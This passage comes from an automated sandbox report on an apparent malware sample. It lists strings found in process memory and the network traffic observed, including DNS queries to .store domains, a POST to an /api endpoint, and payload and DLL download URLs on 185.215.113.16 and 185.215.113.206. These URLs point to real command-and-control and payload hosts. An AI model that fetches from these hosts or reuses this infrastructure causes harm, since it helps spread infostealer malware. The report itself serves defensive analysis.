Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000003.2839804513.000001E3C87AD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2844813161.000001E3C87B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: osk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevation equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2846485551.000001E3C8A74000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2843256720.000001E3C8A73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s--kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevationUser equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: webIsolated=https://facebook.comhttps://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3011244155.000021593DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3002770667.000001E764EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997633717.000001E763CAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3011244155.000021593DC00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.comZ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3011244155.000021593DC00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com_ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2995380035.000001E7639A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997633717.000001E763C32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E7639D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", 
"*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
Source: firefox.exe, 0000001D.00000002.2983794051.000001E7627A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000002.3030925786.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000002.3033486793.0000000001467000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/9
Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/=C
Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/R
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/U
Source: e192e43b61.exe, 0000000B.00000002.3033486793.0000000001467000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/_
Source: e192e43b61.exe, 0000000B.00000002.3032149823.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/c
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/g
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/k
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeL
Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000002.3032979304.0000000001104000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: e192e43b61.exe, 0000000A.00000002.3013027936.000000000084A000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe.exe
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe0
Source: e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeF
Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exee
Source: e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exev
Source: e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe:
Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeencoded
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/t
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/mine/random.exe
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.000000000127E000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206-u
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.000000000143E000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0d60be0de163924d/freebl3.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0d60be0de163924d/mozglue.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0d60be0de163924d/msvcp140.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0d60be0de163924d/msvcp140.dlll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0d60be0de163924d/nss3.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0d60be0de163924d/nss3.dllK
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0d60be0de163924d/softokn3.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0d60be0de163924d/sqlite3.dllo
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0d60be0de163924d/sqlite3.dlls
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0d60be0de163924d/vcruntime140.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0d60be0de163924d/vcruntime140.dllTemp
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/1
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/L
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.000000000143E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/a
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php)
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000000C.00000002.2751119481.0000000001933000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php2
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php7
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpA
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpCGCBGDBKJJKEBFBFH
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpH
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpP
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpY
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php_
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpd
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.0000000000821000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpion:
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpj
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpn
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpp
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpv
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/h
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.0000000000821000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: http://185.215.113.206BFHJK--
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206S
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sextractScheme/fixupChangedProtocol
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: file.exe, 00000000.00000003.1786901695.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732244600.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1872899047.000000000174C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800136771.00000000016FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: e192e43b61.exe, 0000000D.00000003.2806047135.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2908880792.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2914261433.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2883370297.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2926644946.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2898977300.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2792073053.00000000010D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro(x
Source: e192e43b61.exe, 0000000B.00000003.2824471510.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883362074.000000000144E000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
